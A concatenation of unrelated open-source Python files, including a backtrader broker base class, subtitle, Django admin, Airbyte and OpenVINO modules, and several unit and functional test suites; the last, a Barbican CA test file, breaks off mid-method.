# Copyright (C) 2015, 2016, 2017 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader.comminfo import CommInfoBase
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import with_metaclass
from . import fillers as fillers
from . import fillers as filler
class MetaBroker(MetaParams):
def __init__(cls, name, bases, dct):
'''
Class has already been created ... fill missing methods if needed be
'''
# Initialize the class
super(MetaBroker, cls).__init__(name, bases, dct)
translations = {
'get_cash': 'getcash',
'get_value': 'getvalue',
}
for attr, trans in translations.items():
if not hasattr(cls, attr):
setattr(cls, name, getattr(cls, trans))
class BrokerBase(with_metaclass(MetaBroker, object)):
params = (
('commission', CommInfoBase(percabs=True)),
)
def __init__(self):
self.comminfo = dict()
self.init()
def init(self):
# called from init and from start
if None not in self.comminfo:
self.comminfo = dict({None: self.p.commission})
def start(self):
self.init()
def stop(self):
pass
def add_order_history(self, orders, notify=False):
'''Add order history. See cerebro for details'''
raise NotImplementedError
def set_fund_history(self, fund):
'''Add fund history. See cerebro for details'''
raise NotImplementedError
def getcommissioninfo(self, data):
'''Retrieves the ``CommissionInfo`` scheme associated with the given
``data``'''
if data._name in self.comminfo:
return self.comminfo[data._name]
return self.comminfo[None]
def setcommission(self,
commission=0.0, margin=None, mult=1.0,
commtype=None, percabs=True, stocklike=False,
interest=0.0, interest_long=False, leverage=1.0,
automargin=False,
name=None):
'''This method sets a `` CommissionInfo`` object for assets managed in
the broker with the parameters. Consult the reference for
``CommInfoBase``
If name is ``None``, this will be the default for assets for which no
other ``CommissionInfo`` scheme can be found
'''
comm = CommInfoBase(commission=commission, margin=margin, mult=mult,
commtype=commtype, stocklike=stocklike,
percabs=percabs,
interest=interest, interest_long=interest_long,
leverage=leverage, automargin=automargin)
self.comminfo[name] = comm
def addcommissioninfo(self, comminfo, name=None):
'''Adds a ``CommissionInfo`` object that will be the default for all assets if
``name`` is ``None``'''
self.comminfo[name] = comminfo
def getcash(self):
raise NotImplementedError
def getvalue(self, datas=None):
raise NotImplementedError
def get_fundshares(self):
'''Returns the current number of shares in the fund-like mode'''
return 1.0 # the abstract mode has only 1 share
fundshares = property(get_fundshares)
def get_fundvalue(self):
return self.getvalue()
fundvalue = property(get_fundvalue)
def set_fundmode(self, fundmode, fundstartval=None):
'''Set the actual fundmode (True or False)
If the argument fundstartval is not ``None``, it will used
'''
pass # do nothing, not all brokers can support this
def get_fundmode(self):
'''Returns the actual fundmode (True or False)'''
return False
fundmode = property(get_fundmode, set_fundmode)
def getposition(self, data):
raise NotImplementedError
def submit(self, order):
raise NotImplementedError
def cancel(self, order):
raise NotImplementedError
def buy(self, owner, data, size, price=None, plimit=None,
exectype=None, valid=None, tradeid=0, oco=None,
trailamount=None, trailpercent=None,
**kwargs):
raise NotImplementedError
def sell(self, owner, data, size, price=None, plimit=None,
exectype=None, valid=None, tradeid=0, oco=None,
trailamount=None, trailpercent=None,
**kwargs):
raise NotImplementedError
def next(self):
pass
# __all__ = ['BrokerBase', 'fillers', 'filler']
|
from babelsubs.generators.base import BaseGenerator, register
from babelsubs.utils import UNSYNCED_TIME_ONE_HOUR_DIGIT
class SBVGenerator(BaseGenerator):
file_type = 'sbv'
MAPPINGS = dict(linebreaks="[br]")
def __init__(self, subtitles_set, line_delimiter=u'\r\n', language=None):
super(SBVGenerator, self).__init__(subtitles_set, line_delimiter,
language)
def __unicode__(self):
output = []
for from_ms, to_ms, content, meta in self.subtitle_set.subtitle_items(self.MAPPINGS):
start = self.format_time(from_ms)
end = self.format_time(to_ms)
output.append(u'%s,%s' % (start, end))
output.append(content.strip())
output.append(u'')
return self.line_delimiter.join(output)
def format_time(self, time):
if time is None:
time = UNSYNCED_TIME_ONE_HOUR_DIGIT
seconds, milliseconds = divmod(int(time), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
return u'%01i:%02i:%02i.%03i' % (hours, minutes, seconds, milliseconds)
register(SBVGenerator)
|
# lend admin
from django.contrib import admin
from django_admin_listfilter_dropdown.filters import RelatedDropdownFilter, DropdownFilter
from lend_models.class_models.lend_client import LendClientSet, LendClient
class LendClientSetAdmin(admin.ModelAdmin):
list_display = ['name', ]
list_per_page = 25
search_fields = ['name', ]
admin.site.register(LendClientSet, LendClientSetAdmin)
class LendClientAdmin(admin.ModelAdmin):
list_display = [
'client',
'created_date',
'updated_date',
'is_active',
]
list_display_links = [
'client',
]
list_per_page = 25
list_filter = (
# for ordinary fields
('created_date', DropdownFilter),
# for choice fields
# ('a_choicefield', ChoiceDropdownFilter),
# for related fields
# ('lend', RelatedDropdownFilter),
('client', RelatedDropdownFilter),
)
list_editable = [
'is_active'
]
# search_fields = []
inlines = []
admin.site.register(LendClient, LendClientAdmin)
|
import genkey
import db
import re
def genURL(data):
url = data
key = genkey.generateKey()
db.insert(key, url)
return ("localhost:8000/"+key)
def retURL(path):
rankey = re.findall('\/(.*)', path)
for i in rankey:
rankey = i
stourl = db.retrieve(rankey)
return stourl
# print("New URL: sho.rt/"+key)
# url = db.retrieve(key)
# print(url) |
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import argparse
import numpy as np
import struct
import sys
import tensorflow as tf
from random import randint
# Utility functions for generating a recordio encoded file of labeled numpy data
# for testing. Each file contains one or more records. Each record is a TensorFlow
# protobuf Example object. Each object contains an integer label and a numpy array
# encoded as a byte list.
# This file can be used in script mode to generate a single file or be used
# as a module to generate files via build_record_file.
_kmagic = 0xced7230a
padding = {}
for amount in range(4):
if sys.version_info >= (3,):
padding[amount] = bytes([0x00 for _ in range(amount)])
else:
padding[amount] = bytearray([0x00 for _ in range(amount)])
def write_recordio(f, data):
"""Writes a single data point as a RecordIO record to the given file."""
length = len(data)
f.write(struct.pack('I', _kmagic))
f.write(struct.pack('I', length))
pad = (((length + 3) >> 2) << 2) - length
f.write(data)
f.write(padding[pad])
def string_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value.tostring()]))
def label_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def write_numpy_array(f, feature_name, label, arr):
feature = {'labels': label_feature(label), feature_name: string_feature(arr)}
example = tf.train.Example(features=tf.train.Features(feature=feature))
write_recordio(f, example.SerializeToString())
def build_record_file(filename, num_records, dimension, classes=2, data_feature_name='data'):
"""Builds a recordio encoded file of TF protobuf Example objects. Each object
is a labeled numpy array. Each example has two field - a single int64 'label'
field and a single bytes list field, containing a serialized numpy array.
Each generated numpy array is a multidimensional normal with
the specified dimension. The normal distribution is class specific, each class
has a different mean for the distribution, so it should be possible to learn
a multiclass classifier on this data. Class means are determnistic - so multiple
calls to this function with the same number of classes will produce samples drawn
from the same distribution for each class.
Args:
filename - the file to write to
num_records - how many labeled numpy arrays to generate
classes - the cardinality of labels
data_feature_name - the name to give the numpy array in the Example object
dimension - the size of each numpy array.
"""
with open(filename, 'wb') as f:
for i in range(num_records):
cur_class = i % classes
loc = int(cur_class - (classes / 2))
write_numpy_array(f, data_feature_name, cur_class, np.random.normal(loc=loc, size=(dimension,)))
def build_single_record_file(filename, dimension, classes=2, data_feature_name='data'):
cur_class = randint(0, classes - 1)
loc = int(cur_class - (classes / 2))
arr = np.random.normal(loc=loc, size=(dimension,))
feature = {'labels': label_feature(cur_class), data_feature_name: string_feature(arr)}
example = tf.train.Example(features=tf.train.Features(feature=feature))
with open(filename, 'wb') as f:
f.write(example.SerializeToString())
def validate_record_file(filename, dimension):
data = open(filename, 'rb').read()
magic_number, length = struct.unpack('II', data[0:8])
encoded = data[8:8 + length]
features = {
'data': tf.FixedLenFeature([], tf.string),
'labels': tf.FixedLenFeature([], tf.int64),
}
parsed = tf.parse_single_example(encoded, features)
x = tf.decode_raw(parsed['data'], tf.float64)
with tf.Session() as sess:
array = sess.run(x)
assert array.shape[0] == dimension
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Generate synthetic multi-class training data")
parser.add_argument('--dimension', default=65536, type=int)
parser.add_argument('--classes', default=2, type=int)
parser.add_argument('--num-records', default=4, type=int)
parser.add_argument('--data-feature-name', default='data')
parser.add_argument('filename', type=str)
args = parser.parse_args()
build_record_file(args.filename, args.num_records, args.dimension, args.classes, args.data_feature_name)
validate_record_file(args.filename, args.dimension)
|
import os
from typing import List, Dict, Any, Callable
from argparse import Namespace as Arguments
from platform import node as get_hostname
from . import EXECUTION_CONTEXT, MOUNT_CONTEXT
from .utils import (
find_variable_names_in_questions,
ask_yes_no, get_input,
distribution_of_users_per_scenario,
requirements,
)
from .argparse import ArgumentSubParser
from .argparse.bashcompletion import BashCompletionTypes
def create_parser(sub_parser: ArgumentSubParser, parent: str) -> None:
# grizzly-cli run ...
run_parser = sub_parser.add_parser('run', description='execute load test scenarios specified in a feature file.')
run_parser.add_argument(
'--verbose',
action='store_true',
required=False,
help=(
'changes the log level to `DEBUG`, regardless of what it says in the feature file. gives more verbose logging '
'that can be useful when troubleshooting a problem with a scenario.'
)
)
run_parser.add_argument(
'-T', '--testdata-variable',
action='append',
type=str,
required=False,
help=(
'specified in the format `<name>=<value>`. avoids being asked for an initial value for a scenario variable.'
)
)
run_parser.add_argument(
'-y', '--yes',
action='store_true',
default=False,
required=False,
help='answer yes on any questions that would require confirmation',
)
run_parser.add_argument(
'-e', '--environment-file',
type=BashCompletionTypes.File('*.yaml', '*.yml'),
required=False,
default=None,
help='configuration file with [environment specific information](/grizzly/usage/variables/environment-configuration/)',
)
run_parser.add_argument(
'file',
nargs=None,
type=BashCompletionTypes.File('*.feature'),
help='path to feature file with one or more scenarios',
)
if run_parser.prog != f'grizzly-cli {parent} run': # pragma: no cover
run_parser.prog = f'grizzly-cli {parent} run'
@requirements(EXECUTION_CONTEXT)
def run(args: Arguments, run_func: Callable[[Arguments, Dict[str, Any], Dict[str, List[str]]], int]) -> int:
# always set hostname of host where grizzly-cli was executed, could be useful
environ: Dict[str, Any] = {
'GRIZZLY_CLI_HOST': get_hostname(),
'GRIZZLY_EXECUTION_CONTEXT': EXECUTION_CONTEXT,
'GRIZZLY_MOUNT_CONTEXT': MOUNT_CONTEXT,
}
variables = find_variable_names_in_questions(args.file)
questions = len(variables)
manual_input = False
if questions > 0 and not getattr(args, 'validate_config', False):
print(f'feature file requires values for {questions} variables')
for variable in variables:
name = f'TESTDATA_VARIABLE_{variable}'
value = os.environ.get(name, '')
while len(value) < 1:
value = get_input(f'initial value for "{variable}": ')
manual_input = True
environ[name] = value
print('the following values was provided:')
for key, value in environ.items():
if not key.startswith('TESTDATA_VARIABLE_'):
continue
print(f'{key.replace("TESTDATA_VARIABLE_", "")} = {value}')
if manual_input:
ask_yes_no('continue?')
if args.environment_file is not None:
environment_file = os.path.realpath(args.environment_file)
environ['GRIZZLY_CONFIGURATION_FILE'] = environment_file
if not getattr(args, 'validate_config', False):
distribution_of_users_per_scenario(args, environ)
run_arguments: Dict[str, List[str]] = {
'master': [],
'worker': [],
'common': ['--stop'],
}
if args.verbose:
run_arguments['common'] += ['--verbose', '--no-logcapture', '--no-capture', '--no-capture-stderr']
return run_func(args, environ, run_arguments)
|
"""
Test Generate RDF from Assocs
"""
import rdflib
from rdflib.namespace import RDFS
from rdflib import compare
from ontobio.io.gafparser import GafParser
from ontobio.rdfgen.assoc_rdfgen import TurtleRdfWriter, CamRdfTransform
from ontobio.assoc_factory import AssociationSetFactory
from ontobio.ontol_factory import OntologyFactory
POMBASE = "tests/resources/truncated-pombase.gaf"
ONT = "tests/resources/go-truncated-pombase.json"
def test_parse():
ont = OntologyFactory().create(ONT)
p = GafParser()
assocs = p.parse(open(POMBASE, "r"))
#gen(assocs,SimpleAssocRdfTransform(),'simple')
gen(assocs, CamRdfTransform(), 'cam')
def test_rdfgen_includes_taxon_in_gp_class():
assoc = {
'source_line': 'PomBase\tSPAC25B8.17\typf1\t\tGO:1990578\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20150305\tPomBase\t\t',
'subject': {
'id': 'PomBase:SPAC25B8.17',
'label': 'ypf1',
'type': 'protein',
'fullname': 'intramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)',
'synonyms': ['ppp81'],
'taxon': {'id': 'NCBITaxon:4896'}
},
'object': {
'id': 'GO:1990578',
'taxon': 'NCBITaxon:4896'
},
'negated': False,
'qualifiers': [],
'aspect': 'C',
'relation': {'id': 'part_of'},
'interacting_taxon': None,
'evidence': {
'type': 'ISO',
'has_supporting_reference': ['GO_REF:0000024'],
'with_support_from': ['SGD:S000001583']
},
'provided_by': 'PomBase',
'date': '20150305',
"subject_extensions": [],
"object_extensions": {}
}
rdfWriter = TurtleRdfWriter(label="pombase_single.ttl")
gaf_transformer = CamRdfTransform(writer=rdfWriter)
gaf_transformer.translate(assoc)
gaf_transformer.provenance()
gp_res = rdfWriter.graph.query(gene_product_class_query())
for row in gp_res:
assert str(row["cls"]) == "http://identifiers.org/pombase/SPAC25B8.17"
assert str(row["taxon"]) == "http://purl.obolibrary.org/obo/NCBITaxon_4896"
def gene_product_class_query():
return """
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX NCBITaxon: <http://purl.obolibrary.org/obo/NCBITaxon_>
PREFIX RO: <http://purl.obolibrary.org/obo/RO_>
SELECT ?cls ?taxon
WHERE {
?cls rdfs:subClassOf [ a owl:Restriction ;
owl:onProperty RO:0002162 ;
owl:someValuesFrom ?taxon ] .
}
"""
def gen(assocs, tr, n):
fn = 'tests/resources/{}.rdf'.format(n)
tr.emit_header()
for a in assocs:
tr.translate(a)
tr.writer.serialize(destination=open(fn,'wb'))
#tr.writer.serialize(fn, 'ntriples')
|
import datetime
import unittest
from sqlalchemy.orm import sessionmaker
from bot.conversations.statistics.utils import get_consumptions_for_graph_user, get_earnings_for_graph_user
from bot.models import Base, Consumption, User, Earning
from tests.test_models import engine
from tests.utils_models import add_example_user, example_category_consumption, add_example_category_consumption, \
add_example_category_earning
Session = sessionmaker(bind=engine)
session = Session()
class GetConsumptionsForGraphUser(unittest.TestCase):
def setUp(self):
Base.metadata.create_all(engine)
add_example_user(session)
add_example_category_consumption(session)
def tearDown(self):
Base.metadata.drop_all(engine)
def test_time_period_has_not_dash(self):
time_period = '10.02.2020'
session.add(Consumption(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 11, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Consumption(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(100.0, 1)]
actual = get_consumptions_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
def test_time_period_has_dash(self):
time_period = '10.02.2020 - 12.02.2020'
session.add(Consumption(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 12, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Consumption(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(300.0, 1)]
actual = get_consumptions_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
class GetEarningForGraphUser(unittest.TestCase):
def setUp(self):
Base.metadata.create_all(engine)
add_example_user(session)
add_example_category_earning(session)
def tearDown(self):
Base.metadata.drop_all(engine)
def test_time_period_has_not_dash(self):
time_period = '10.02.2020'
session.add(Earning(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 11, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Earning(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(100.0, 1)]
actual = get_earnings_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
def test_time_period_has_dash(self):
time_period = '10.02.2020 - 12.02.2020'
session.add(Earning(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 12, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Earning(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(300.0, 1)]
actual = get_earnings_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
|
# -*- coding: utf-8 -*-
from ..errors import XmppError
from ..stanzas import Stanza
NS_URI = "urn:ietf:params:xml:ns:xmpp-tls"
async def handle(stream, feature_elem, timeout=None):
nsmap = {"tls": NS_URI}
stream.send(Stanza("starttls", nsmap={None: NS_URI}))
resp = await stream.wait([("/tls:proceed", nsmap),
("/tls:failure", nsmap)], timeout=timeout)
if resp.name == "{%s}proceed" % NS_URI:
await stream._transport.starttls()
else:
# A real stanza/stream error type is not wrapped by the <failure/>,
# unlike other newer protocols, so gin up a dummy.
raise XmppError("starttls failure: %s" % resp.toXml().decode())
return True
def isRequired(feature_elem):
return ("{%s}required" % NS_URI) in [c.tag for c in feature_elem]
|
import torch
import torch.nn as nn
from glasses.models.classification.fishnet import FishNet, FishNetBottleNeck
from glasses.nn.att import SpatialSE
from torchinfo import summary
def test_fishnet():
device = torch.device('cpu')
x = torch.rand(1, 3,224,224)
model = FishNet().eval()
pred = model(x)
assert pred.shape[-1] == 1000
# test fishnet99
model = FishNet.fishnet99().eval()
pred = model(x)
assert pred.shape[-1] == 1000
# n_params, _ = summary(model.to(device), (3, 224, 224), device=device)
# # we know the correct number of paramters of fishnet
# assert n_params.item() == 16628904
# test fishnet150
model = FishNet.fishnet150().eval()
pred = model(x)
assert pred.shape[-1] == 1000
# n_params, _ = summary(model.to(device), (3, 224, 224), device=device)
# # we know the correct number of paramters of fishnet
# assert n_params.item() == 24959400
block = lambda in_ch, out_ch, **kwargs: nn.Sequential(FishNetBottleNeck(in_ch, out_ch), SpatialSE(out_ch))
model = FishNet.fishnet99(block=block)
pred = model(x)
assert pred.shape[-1] == 1000
# summary(model.to(device), (3, 224, 224))
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import logging
from typing import Any, List, Mapping, Tuple, Type
import pendulum
from airbyte_cdk.models import AuthSpecification, ConnectorSpecification, DestinationSyncMode, OAuth2Specification
from airbyte_cdk.sources import AbstractSource
from airbyte_cdk.sources.streams import Stream
from source_facebook_marketing.api import API
from source_facebook_marketing.spec import ConnectorConfig, InsightConfig
from source_facebook_marketing.streams import (
Activities,
AdAccount,
AdCreatives,
Ads,
AdSets,
AdsInsights,
AdsInsightsActionType,
AdsInsightsAgeAndGender,
AdsInsightsCountry,
AdsInsightsDma,
AdsInsightsPlatformAndDevice,
AdsInsightsRegion,
Campaigns,
Images,
Videos,
)
logger = logging.getLogger("airbyte")
class SourceFacebookMarketing(AbstractSource):
def check_connection(self, _logger: "logging.Logger", config: Mapping[str, Any]) -> Tuple[bool, Any]:
"""Connection check to validate that the user-provided config can be used to connect to the underlying API
:param config: the user-input config object conforming to the connector's spec.json
:param _logger: logger object
:return Tuple[bool, Any]: (True, None) if the input config can be used to connect to the API successfully, (False, error) otherwise.
"""
config = ConnectorConfig.parse_obj(config)
if pendulum.instance(config.end_date) < pendulum.instance(config.start_date):
raise ValueError("end_date must be equal or after start_date.")
api = API(account_id=config.account_id, access_token=config.access_token)
logger.info(f"Select account {api.account}")
return True, None
def streams(self, config: Mapping[str, Any]) -> List[Type[Stream]]:
"""Discovery method, returns available streams
:param config: A Mapping of the user input configuration as defined in the connector spec.
:return: list of the stream instances
"""
config: ConnectorConfig = ConnectorConfig.parse_obj(config)
api = API(account_id=config.account_id, access_token=config.access_token)
insights_args = dict(
api=api,
start_date=config.start_date,
end_date=config.end_date,
)
streams = [
AdAccount(api=api),
AdSets(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Ads(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
AdCreatives(api=api, fetch_thumbnail_images=config.fetch_thumbnail_images),
AdsInsights(**insights_args),
AdsInsightsAgeAndGender(**insights_args),
AdsInsightsCountry(**insights_args),
AdsInsightsRegion(**insights_args),
AdsInsightsDma(**insights_args),
AdsInsightsPlatformAndDevice(**insights_args),
AdsInsightsActionType(**insights_args),
Campaigns(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Images(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Videos(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Activities(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
]
return self._update_insights_streams(insights=config.custom_insights, default_args=insights_args, streams=streams)
def spec(self, *args, **kwargs) -> ConnectorSpecification:
"""Returns the spec for this integration.
The spec is a JSON-Schema object describing the required configurations
(e.g: username and password) required to run this integration.
"""
return ConnectorSpecification(
documentationUrl="https://docs.airbyte.io/integrations/sources/facebook-marketing",
changelogUrl="https://docs.airbyte.io/integrations/sources/facebook-marketing",
supportsIncremental=True,
supported_destination_sync_modes=[DestinationSyncMode.append],
connectionSpecification=ConnectorConfig.schema(),
authSpecification=AuthSpecification(
auth_type="oauth2.0",
oauth2Specification=OAuth2Specification(
rootObject=[], oauthFlowInitParameters=[], oauthFlowOutputParameters=[["access_token"]]
),
),
)
def _update_insights_streams(self, insights: List[InsightConfig], default_args, streams) -> List[Type[Stream]]:
"""Update method, if insights have values returns streams replacing the
default insights streams else returns streams
"""
if not insights:
return streams
insights_custom_streams = list()
for insight in insights:
args = dict(
api=default_args["api"],
name=f"Custom{insight.name}",
fields=list(set(insight.fields)),
breakdowns=list(set(insight.breakdowns)),
action_breakdowns=list(set(insight.action_breakdowns)),
time_increment=insight.time_increment,
start_date=insight.start_date or default_args["start_date"],
end_date=insight.end_date or default_args["end_date"],
)
insight_stream = AdsInsights(**args)
insights_custom_streams.append(insight_stream)
return streams + insights_custom_streams
|
"""
Copyright (C) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.front.common.partial_infer.utils import int64_array
from mo.front.common.replacement import FrontReplacementPattern
from mo.front.tf.graph_utils import create_op_with_const_inputs
from mo.graph.graph import Graph
from mo.ops.reshape import Reshape
class OneHotDepthNormalizer(FrontReplacementPattern):
"""
Transformation performs squeezeng one-element tensors on 1st input in OneHot into 0D scalars. This transformation
allows to avoid problems with some models produced by tf2onnx which have 1D depth in OneHot.
"""
enabled = True
def pattern(self):
return dict(
nodes=[
('onehot', dict(kind='op', type='OneHot'))],
edges=[]
)
@staticmethod
def replace_pattern(graph: Graph, match: dict):
node = match['onehot']
node_name = node.soft_get('name', node.id)
reshape = create_op_with_const_inputs(graph, Reshape, {1: int64_array([])}, {'name': node_name + '/Reshape'})
node.in_port(1).get_connection().insert_node(reshape)
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import copy
import datetime
import re
import testtools
import time
from OpenSSL import crypto
from barbican.common import hrefs
from barbican.plugin.interface import certificate_manager as cert_interface
from barbican.tests import certificate_utils as certutil
from functionaltests.api import base
from functionaltests.api.v1.behaviors import ca_behaviors
from functionaltests.api.v1.behaviors import container_behaviors
from functionaltests.api.v1.behaviors import order_behaviors
from functionaltests.api.v1.behaviors import secret_behaviors
from functionaltests.api.v1.models import ca_models
from functionaltests.api.v1.models import order_models
from functionaltests.common import config
CONF = config.get_config()
dogtag_subcas_enabled = False
admin_a = CONF.rbac_users.admin_a
admin_b = CONF.rbac_users.admin_b
creator_a = CONF.rbac_users.creator_a
service_admin = CONF.identity.service_admin
order_simple_cmc_request_data = {
'type': 'certificate',
'meta': {
'request_type': 'simple-cmc',
'requestor_name': 'Barbican User',
'requestor_email': '[email protected]',
'requestor_phone': '555-1212'
}
}
BARBICAN_SRV_CONF = cert_interface.CONF
def is_plugin_enabled(plugin):
return plugin in BARBICAN_SRV_CONF.certificate.enabled_certificate_plugins
def depends_on_ca_plugins(*plugins):
def depends_on_ca_plugins_decorator(function):
def wrapper(instance, *args, **kwargs):
plugins_enabled = (is_plugin_enabled(p) for p in plugins)
if not all(plugins_enabled):
instance.skipTest("The following plugin(s) need to be "
"enabled: {}".format(plugins))
function(instance, *args, **kwargs)
return wrapper
return depends_on_ca_plugins_decorator
def convert_to_X509Name(dn):
target = crypto.X509().get_subject()
fields = dn.split(',')
for field in fields:
m = re.search(r"(\w+)\s*=\s*(.+)", field.strip())
name = m.group(1)
value = m.group(2)
if name.lower() == 'ou':
target.OU = value
elif name.lower() == 'st':
target.ST = value
elif name.lower() == 'cn':
target.CN = value
elif name.lower() == 'l':
target.L = value
elif name.lower() == 'o':
target.O = value
return target
class CATestCommon(base.TestCase):
def setUp(self):
super(CATestCommon, self).setUp()
self.order_behaviors = order_behaviors.OrderBehaviors(self.client)
self.ca_behaviors = ca_behaviors.CABehaviors(self.client)
self.container_behaviors = container_behaviors.ContainerBehaviors(
self.client)
self.secret_behaviors = secret_behaviors.SecretBehaviors(self.client)
self.simple_cmc_data = copy.deepcopy(order_simple_cmc_request_data)
def tearDown(self):
self.order_behaviors.delete_all_created_orders()
self.ca_behaviors.delete_all_created_cas()
self.container_behaviors.delete_all_created_containers()
self.secret_behaviors.delete_all_created_secrets()
super(CATestCommon, self).tearDown()
def send_test_order(self, ca_ref=None, user_name=None,
expected_return=202):
test_model = order_models.OrderModel(**self.simple_cmc_data)
test_model.meta['request_data'] = base64.b64encode(
certutil.create_good_csr())
if ca_ref is not None:
ca_id = hrefs.get_ca_id_from_ref(ca_ref)
test_model.meta['ca_id'] = ca_id
create_resp, order_ref = self.order_behaviors.create_order(
test_model, user_name=user_name)
self.assertEqual(expected_return, create_resp.status_code)
if expected_return == 202:
self.assertIsNotNone(order_ref)
return order_ref
def wait_for_order(self, order_resp, order_ref):
# Make sure we have an active order
time_count = 1
while order_resp.model.status != "ACTIVE" and time_count <= 4:
time.sleep(1)
time_count += 1
order_resp = self.behaviors.get_order(order_ref)
def get_root_ca_ref(self, ca_plugin_name, ca_plugin_id):
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas(
limit=100)
for item in cas:
ca = self.ca_behaviors.get_ca(item)
if ca.model.plugin_name == ca_plugin_name:
if ca.model.plugin_ca_id == ca_plugin_id:
return item
return None
def get_snakeoil_root_ca_ref(self):
return self.get_root_ca_ref(
ca_plugin_name=('barbican.plugin.snakeoil_ca.'
'SnakeoilCACertificatePlugin'),
ca_plugin_id="Snakeoil CA")
def get_dogtag_root_ca_ref(self):
return self.get_root_ca_ref(
ca_plugin_name='barbican.plugin.dogtag.DogtagCAPlugin',
ca_plugin_id="Dogtag CA")
class CertificateAuthoritiesTestCase(CATestCommon):
def setUp(self):
super(CertificateAuthoritiesTestCase, self).setUp()
self.subca_name = "Subordinate CA"
self.subca_description = "Test Snake Oil Subordinate CA"
self.subca_subca_name = "Sub-Sub CA"
self.subca_subca_description = "Test Snake Oil Sub-Sub CA"
def get_signing_cert(self, ca_ref):
resp = self.ca_behaviors.get_cacert(ca_ref)
return crypto.load_certificate(crypto.FILETYPE_PEM, resp.text)
def verify_signing_cert(self, ca_ref, subject_dn, issuer_dn):
cacert = self.get_signing_cert(ca_ref)
